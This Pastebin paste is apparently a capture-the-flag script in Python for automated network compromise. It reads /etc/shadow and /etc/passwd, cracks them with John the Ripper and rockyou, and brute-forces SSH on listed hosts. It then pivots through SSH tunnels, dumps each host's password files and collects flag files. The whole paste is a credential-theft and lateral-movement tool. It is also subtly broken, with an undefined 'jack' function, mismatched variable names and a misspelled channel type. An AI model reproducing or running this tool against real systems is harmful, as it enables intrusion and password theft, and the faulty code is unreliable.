Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python
- import os
- import paramiko
- import re
- import subprocess
- import sys
- CRED_REGEX = re.compile("^(\S+)\s+\((\S+)\)$")
- FLAG_LOCS = {}
- SEEN = []
- REVISIT = []
- NUM_SHDW = 0
- NUM_SSHK = 0
- active_user = ""
- active_pass = ""
- creds = {
- "SELF": [(active_user, active_pass)]
- }
- usrs = [active_user]
- pwds = [active_pass]
- ip_temp = []
- ip = []
- conn = {}
- def revisit2():
- global REVISIT, creds
- tmp = []
- for (ipa, wfrom) in REVISIT:
- for pwd in pwds:
- try:
- print("[*] *revisiting for root* Attempting login to %s with root/%s" % (ipa, pwd))
- if wfrom:
- (_, connection, sport) = conn[wfrom]
- (tnl, cli) = tunnel(ipa, "root", pwd, connection)
- else:
- (tnl, cli) = tunnel(ipa, "root", pwd)
- connection = cli
- conn[ipa] = (tnl, cli)
- tmp.append((ipa, wfrom))
- print("[*] Login to %s succeeded" % (ipa))
- if ipa in creds.keys():
- creds[ipa].append(("root", pwd))
- else:
- creds[ipa] = [("root", pwd)]
- (_, stdout, stderr) = connection.exec_command("cat ~/servers.txt")
- tmp = stdout.read()
- if tmp:
- print("[*] Found servers file on %s" % (ipa))
- for i in tmp.strip().split("\n"):
- if i not in ip_temp:
- ip.append((i, ipa))
- ip_temp.append(i)
- print("[+] Adding %s to global target queue" % (str(tmp.strip().split("\n"))))
- else:
- print("[*] Servers file not found on %s" % (ipa))
- (_, stdout, stderr) = connection.exec_command("cat /flag.txt")
- tmp = stdout.read()
- if tmp:
- if ipa not in FLAG_LOCS.keys():
- print("[!] Flag file found on %s, contents: \"%s\"" % (ipa, tmp))
- FLAG_LOCS[ipa] = tmp
- else:
- print("[!] Flag file had been found before on %s" % (ipa))
- elif stderr.read():
- print("[*] No flag file found on %s" % (ipa))
- (_, stdout, stderr) = connection.exec_command("cat /etc/shadow")
- shdw = stdout.read()
- (_, stdout, stderr) = connection.exec_command("cat /etc/passwd")
- pawd = stdout.read()
- jack(pawd, shdw)
- except Exception as e:
- print(e)
- continue
- for i in tmp:
- REVISIT.remove(i)
- def tunnel(dst, usr, pwd, cli=None):
- paramiko.util.log_to_file("log.txt")
- dst_info = dst.split(":")
- dst_cli = paramiko.SSHClient()
- dst_cli.set_missing_host_key_policy(paramiko.AutoAddPolicy())
- if cli:
- t = cli.get_transport()
- chan = t.open_channel("direct-tcip", src_addr=("127.0.0.1", 22), dest_addr=(dst_info[0], int(dst_info[1])))
- dst_cli.connect(dst_info[0], port=int(dst_info[1]), username=usr, password=pw, sock=chan)
- else:
- t = None
- dst_cli.connect(dst_info[0], port=int(dst_info[1]), username=usr, password=pw)
- return (t, dst_cli)
- def crack(ipa, wfrom):
- global conn, creds
- for usr in usrs:
- for pwd in pwds:
- try:
- print("[*] Attempting login to %s with %s/%s" % (ipa, usr, pwd))
- if wfrom in conn.keys():
- (_, connection) = conn[wfrom]
- (tnl, cli) = tunnel(ipa, usr, pwd, connection)
- else:
- (tnl, cli) = tunnel(ipa, usr, pwd)
- if ipa in creds.keys():
- creds[ipa].append((usr, pwd))
- else:
- creds[ipa] = [(usr, pwd)]
- conn[ipa] = (tnl, cli)
- SEEN.append(ipa)
- print("[*] Login to %s succeeded" % (ipa))
- return usr
- except Exception as e:
- continue
- return False
- def crack_john(pwd, shdw):
- alter = False
- global usrs, pwds, NUM_SHDW
- NUM_SHDW += 1
- try:
- pfile = open("password.txt", "w")
- sfile = open("shadow.txt", "w")
- pfile.write(str(pwd))
- sfile.write(str(shdw))
- pfile.close()
- sfile.close()
- subprocess.Popen("unshadow password.txt shadow.txt > pwds", shell=True)
- result = subprocess.Popen("john pwds --wordlist=rockyou.txt", stdout=subprocess.PIPE, shell=True)
- for line in result.stdout.readlines():
- credentials = CRED_REGEX.match(line)
- if credentials:
- usr = credentials.group(2)
- if usr not in usrs:
- usrs.append(usr)
- alter = True
- pas = creds.group(1)
- if pas not in pwds:
- pwds.append(pas)
- alter = True
- subprocess.Popen("rm password.txt shadow.txt pwds", shell=True)
- return alter
- except Exception as e:
- print(e)
- print("Failed to crack passwords using john")
- return alter
- #if __name__ == "__main__":
- ip_list = subprocess.Popen("cat ~/servers.txt", stdout=subprocess.PIPE, shell=True)
- print("[*] Read targets file")
- for i in ip_list.stdout.read().strip().split("\n"):
- ip.append((i, None))
- # crack first password and store info to lists
- shadow = subprocess.Popen("cat /etc/shadow", stdout=subprocess.PIPE, shell=True)
- password = subprocess.Popen("cat /etc/passwd", stdout=subprocess.PIPE, shell=True)
- # call to jack
- crack_john(password.stdout.read(), shadow.stdout.read())
- while(ip):
- curr,wfrom = ip.pop(0)
- user = crack(curr, wfrom)
- tmp = ""
- if not ((set(ip) | set(REVISIT)) - set(SEEN)):
- break
- try:
- if user:
- # check user
- if user != "root":
- REVISIT.append((curr, wfrom))
- (_, connection) = conn[curr]
- (_, stdout, stderr) = connection.exec_command("cat ~/servers.txt")
- tmp = stdout.read()
- if tmp:
- print("[*] Found servers file on %s" % (curr))
- for i in tmp.strip().split("\n"):
- if i not in ip_temp:
- ip.append((i, curr))
- ip_temp.append(i)
- print("[+] Adding %s to global target queue" % (str(tmp.strip().split("\n"))))
- else:
- print("[*] Servers file not found on %s" % (curr))
- (_, stdout, stderr) = connection.exec_command("cat /flag.txt")
- f = stdout.read()
- if f:
- if curr not in FLAG_LOCS.keys():
- print("[!] Flag file found on %s, contents: \"%s\"" % (curr, f))
- FLAG_LOCS[curr] = f
- else:
- print("[!] Flag file had been found before on %s" % (curr))
- elif stderr.read():
- print("[*] No flag file found on %s" % (curr))
- (_, stdout, stderr) = connection.exec_command("cat /etc/shadow")
- tmp = stdout.read()
- if tmp:
- (_, stdout, stderr) = connection.exec_command("cat /etc/passwd")
- print("[*] Dumping /etc/shadow")
- jack(stdout.read(), tmp)
- revisit2()
- elif stderr.read():
- print("[*] User %s on %s cannot access /etc/shadow")
- else:
- print("[*] %s back in line" % (curr))
- ip.append((curr, wfrom))
- except Exception as e:
- #print(e)
- continue
- print("\n%s" % ("=" * 15))
- print("Collected %s /etc/shadow files" % (str(NUM_SHDW)))
- print("Cracked %s passwords" % (str(len(pwds))))
- print("Found %s flag files" % (str(len(FLAG_LOCS.keys()))))
- print("Accessed following ips: %s" % (str(creds)))
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement